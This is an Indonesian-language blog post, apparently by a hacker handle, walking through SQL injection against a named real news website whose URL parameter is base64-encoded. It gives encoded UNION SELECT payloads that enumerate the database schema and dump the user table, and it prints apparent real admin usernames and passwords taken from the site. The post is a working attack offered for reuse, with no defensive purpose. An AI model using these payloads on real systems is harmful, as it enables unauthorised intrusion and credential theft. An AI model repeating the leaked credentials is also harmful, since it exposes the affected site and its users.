Sql injection url with encoded base64

kali ini saya akan membahas tentang SQL injection pada url yang di encoded menggunkan base64
base64 adalah
Tool hex and base64 converter

download
target kita kali ini website yang menggunakan encoded url base64
http://radar-bogor.co.id/?kanalid=MTQ=
penggunaan base64 pada url adalah salah satu trik admin untuk mengelabui para newbie dan jarang sekali orang yang memakai base64
disini saya mengambil sample salah satu website indo
http://radar-bogor.co.id/?kanalid=MTQ=
kita test apakah web ini mempunyai bug SQLi
http://radar-bogor.co.id/?kanalid=MTQn
terlihat error
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/t91653/sites/radar-bogor.co.id/www/body_kanal.php on line 11

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/sloki/user/t91653/sites/radar-bogor.co.id/www/body_kanal.php on line 22

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/t91653/sites/radar-bogor.co.id/www/body_kanal.php on line 25

ini karena MTQ= di ubah menjadi MTQn
lalu apakah MTQ= itu
MTQ= adalah hasil encoded dari base64
Coba lihat salah satu tool saya
MTQ= bila di decode 14
MTQn decode 14’
kita check berapa fieldnya
http://radar-bogor.co.id/?kanalid=MTQgb3JkZXIgYnkgMS0t
MTQgb3JkZXIgYnkgMS0t decoded 14 order by 1-- = true

http://radar-bogor.co.id/?kanalid=MTQgb3JkZXIgYnkgNS0t
MTQgb3JkZXIgYnkgNS0t decoded 14 order by 5-- = true

http://radar-bogor.co.id/?kanalid=MTQgb3JkZXIgYnkgOC0t
MTQgb3JkZXIgYnkgOC0t decoded 14 order by 8-- = false

pada field yang ke 8 terlihat error
berarti dalam website ini hanya terdapat 7 field
kita bonkar isinya
-14 union all select 1,2,3,4,5,6,7--
http://radar-bogor.co.id/?kanalid=LTE0IHVuaW9uIGFsbCBzZWxlY3QgMSwyLDMsNCw1LDYsNy0t

keluar field ke 2
kita keluarkan nama2 tablenya
-14 union all select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables--
encoded
http://radar-bogor.co.id/?kanalid=LTE0IHVuaW9uIGFsbCBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyw0LDUs
Niw3IGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcy0t

terlihat table2 dari website
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,escevents,forum_post,forum_postext,forum_smile,forum_topic,tbl_article,tbl_article_comment,tbl_banner,tbl_category,tbl_contact,tbl_gallery,tbl_gallery_cat,tbl_iklan,tbl_iklan_cat,tbl_marquee,tbl_member,tbl_nl_archives,tbl_nl_config,tbl_nl_email,tbl_nl_listsconfig,tbl_nl_sub,tbl_nl_temp,tbl_polling,tbl_polling_answer,tbl_sms,tbl_sms_cat,tbl_upload,tbl_user
kita coba buka column dari table tbl_user
-14 union all select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='tbl_user'--
encoded
http://radar-bogor.co.id/?kanalid=LTE0IHVuaW9uIGFsbCBzZWxlY3QgMSxncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDMsNCw1
LDYsNyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9
J3RibF91c2VyJy0t

keluar columns
User_ID,User_Name,User_Password,First_Name,Last_Name,User_email,User_Address,User_Phone,User_HP,User_Status,catuser,Join_Date
kita keluarkan isi dari column User_Name,User_Password dari table tbl_user
-14 union all select 1,group_concat( User_Name,0x3a,User_Password),3,4,5,6,7 from tbl_user--
http://radar-bogor.co.id/?kanalid=LTE0IHVuaW9uIGFsbCBzZWxlY3QgMSxncm91cF9jb25jYXQoIFVzZXJfTmFtZSwweDNhLFVz
ZXJfUGFzc3dvcmQpLDMsNCw1LDYsNyBmcm9tIHRibF91c2VyLS0=

get it
superadmin:ivan,content:pass,webmaster:punt3n,supervisor:pass,iben:101112,denie:maryana,afandi:422159

thanks to letjen, EA Ngel, cyberlog, rahox, cyber byte, shamus, cybermuttaqin, Agoes_doubleb, thomas_ipt, blackpaper, deepgreat2003, achyx, presiden, wishnu, kiddies, mywisdom and all crew whitecyber, jasakom, echo, sekuritionline

regards
k3nz0

Advertisements
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: